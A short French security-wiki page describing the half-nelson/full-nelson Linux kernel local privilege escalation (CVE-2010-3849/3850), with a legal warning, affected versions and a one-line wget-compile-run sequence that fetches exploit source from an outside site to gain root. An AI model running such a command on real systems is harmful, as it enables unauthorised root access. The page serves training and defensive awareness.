Nelson
🔒 Contenu de sécurité — usage encadré
Cette page décrit un exploit d'élévation de privilèges noyau à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| CVE | CVE-2010-3849 / CVE-2010-3850 |
| Type | Elevation de privileges locale (root) |
| Cause | Vulnerabilite Econet du noyau Linux |
| Cibles | Noyaux Linux < 2.6.37 |
half-nelson / full-nelson est un exploit local root du noyau Linux (Econet, CVE-2010-3849 et CVE-2010-3850) affectant les noyaux anterieurs a la 2.6.37.
monter les privileges en root
La vulnérabilité affecte les distributions Linux basées sur des versions inférieures à la 2.6.37 du kernel.
# wget www.tux-planet.fr/public/hack/exploits/kernel/nelson.c # gcc -o nelson nelson.c # ./nelson
- il ne concerne donc pas Slackware et Debian (le symbole résolu n'existe pas sous ces distributions)
- il ne concerne pas Red Hat car cette distribution ne supporte pas Econet par défaut
- il ne concerne pas les Ubuntu et Debian qui ont été mises à jour (CVE-2010-3849 et CVE-2010-3850)
notes
http://www.tux-planet.fr/local-root-exploit/